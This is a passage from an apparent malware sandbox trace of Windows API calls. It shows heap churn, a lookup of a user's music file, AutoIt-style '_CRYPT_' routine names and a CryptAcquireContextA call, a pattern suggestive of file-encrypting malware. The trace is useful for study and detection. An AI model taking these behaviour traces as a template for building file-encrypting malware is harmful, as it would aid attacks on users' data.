lpMem=0x2e545d0 | out: hHeap=0x970000) returned 1 [0245.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0245.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0245.676] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0245.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0245.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0245.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0245.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0245.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0245.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0245.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0245.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0245.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0245.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0245.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0245.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0245.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0245.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0245.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0245.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0245.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0245.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0245.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0245.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0245.677] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\n2lzfQolvCVgNf.m4a", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc85340e0, ftCreationTime.dwHighDateTime=0x1d5e6eb, ftLastAccessTime.dwLowDateTime=0x738e2d90, ftLastAccessTime.dwHighDateTime=0x1d5e92f, ftLastWriteTime.dwLowDateTime=0x738e2d90, ftLastWriteTime.dwHighDateTime=0x1d5e92f, nFileSizeHigh=0x0, nFileSizeLow=0x103c1, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="n2lzfQolvCVgNf.m4a", cAlternateFileName="N2LZFQ~1.M4A")) returned 0xa874d0 [0245.677] FindClose (in: hFindFile=0xa874d0 | out: hFindFile=0xa874d0) returned 1 [0245.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0245.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0245.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0245.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0245.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0245.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0245.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0245.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0245.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0245.678] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0245.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0245.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0245.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0245.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0245.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0245.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0245.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0245.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0245.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0245.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0245.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0245.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0245.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0245.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0245.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0245.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0245.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0245.678] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0245.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0245.678] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0245.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54620 | out: hHeap=0x970000) returned 1 [0245.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0245.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d40 [0245.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0245.679] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0245.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0245.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ab0 [0245.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0245.679] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0245.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ab0 | out: hHeap=0x970000) returned 1 [0245.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0245.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0245.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0245.679] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0245.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0245.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0245.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0245.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0245.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0245.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0245.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0245.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0245.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0245.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0245.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0245.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0245.680] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0245.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0245.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0245.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0245.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0245.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0245.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0245.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0245.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0245.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0245.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0245.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0245.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0245.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0245.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0245.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0245.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0245.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0245.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0245.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0245.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0245.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0245.680] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0245.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0245.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0245.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0245.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0245.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0245.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0245.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0245.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54620 | out: hHeap=0x970000) returned 1 [0245.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0245.681] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0245.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0245.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0245.681] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0245.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55e68 [0245.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0245.681] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0245.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55e68 | out: hHeap=0x970000) returned 1 [0245.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0245.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0245.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c98 [0245.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0245.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0245.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0245.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0245.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50db8 [0245.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0245.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0245.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0245.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0245.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0245.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0245.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0245.682] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0245.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0245.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0245.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0245.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0245.682] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0245.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0245.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0245.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0245.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0245.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54620 | out: hHeap=0x970000) returned 1 [0245.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0245.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0245.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0245.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0245.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0245.682] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0245.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0245.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0245.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0245.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0245.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0245.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0245.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0245.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0245.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0245.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0245.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0245.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0245.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0245.683] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0245.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0245.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0245.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0245.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0245.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0245.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0245.683] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0245.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0245.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0245.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0245.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0245.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0245.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0245.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0245.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0245.684] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0245.684] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0245.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ab0 | out: hHeap=0x970000) returned 1 [0245.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0245.684] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0245.684] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0245.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0245.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69ac8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0245.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0245.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0245.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69ac8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0245.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0245.685] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0245.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0245.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0245.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0245.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0245.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0245.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0245.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0245.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0245.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0245.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0245.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0245.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0245.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0245.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0245.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0245.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0245.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0245.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0245.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0245.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0245.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0245.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0245.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0245.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0245.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0245.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0245.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0245.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 